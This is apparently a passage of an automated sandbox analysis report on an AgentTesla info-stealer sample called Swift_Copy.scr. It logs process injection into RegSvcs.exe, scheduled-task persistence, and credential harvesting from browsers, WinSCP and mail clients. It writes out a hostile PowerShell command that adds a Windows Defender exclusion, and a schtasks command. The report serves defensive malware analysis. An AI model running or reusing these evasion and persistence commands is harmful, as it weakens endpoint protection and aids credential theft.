                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93956Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93718Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93609Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: RegSvcs.exe, 00000007.00000002.2124233403.0000000005BD2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAN Miniport (Network Monitor)-QoS Packet Scheduler-0000-
                    Source: RegSvcs.exe, 0000000C.00000002.3284308297.00000000061EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:\bb
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe"
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe"Jump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\Swift_Copy.scrMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\Swift_Copy.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\Swift_Copy.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 652008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CFE008Jump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp7FF5.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WAuLmtFUmD" /XML "C:\Users\user\AppData\Local\Temp\tmp8D33.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrQueries volume information: C:\Users\user\Desktop\Swift_Copy.scr VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeQueries volume information: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\WAuLmtFUmD.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Swift_Copy.scrKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 8.2.WAuLmtFUmD.exe.50a5450.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.WAuLmtFUmD.exe.506aa30.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Swift_Copy.scr.44510c0.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Swift_Copy.scr.44166a0.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.WAuLmtFUmD.exe.50a5450.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Swift_Copy.scr.44166a0.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.WAuLmtFUmD.exe.506aa30.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.3276330521.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2113537992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2118653417.00000000028FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.3276330521.0000000002E37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2108100860.0000000004416000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2118653417.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2140171444.000000000506A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Swift_Copy.scr PID: 4592, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5948, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WAuLmtFUmD.exe PID: 5960, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1276, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 8.2.WAuLmtFUmD.exe.50a5450.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.WAuLmtFUmD.exe.506aa30.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Swift_Copy.scr.44510c0.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Swift_Copy.scr.44166a0.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.WAuLmtFUmD.exe.50a5450.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Swift_Copy.scr.44166a0.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.WAuLmtFUmD.exe.506aa30.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.2113537992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2108100860.0000000004416000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2118653417.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2140171444.000000000506A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Swift_Copy.scr PID: 4592, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5948, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WAuLmtFUmD.exe PID: 5960, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1276, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 8.2.WAuLmtFUmD.exe.50a5450.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.WAuLmtFUmD.exe.506aa30.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Swift_Copy.scr.44510c0.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Swift_Copy.scr.44166a0.9.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.WAuLmtFUmD.exe.50a5450.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Swift_Copy.scr.44166a0.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Swift_Copy.scr.44510c0.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.WAuLmtFUmD.exe.506aa30.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.3276330521.0000000002E4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2113537992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2118653417.00000000028FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.3276330521.0000000002E37000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2108100860.0000000004416000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2118653417.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.2140171444.000000000506A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Swift_Copy.scr PID: 4592, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5948, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: WAuLmtFUmD.exe PID: 5960, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1276, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		311
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Scheduled Task/Job                    		3
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		211
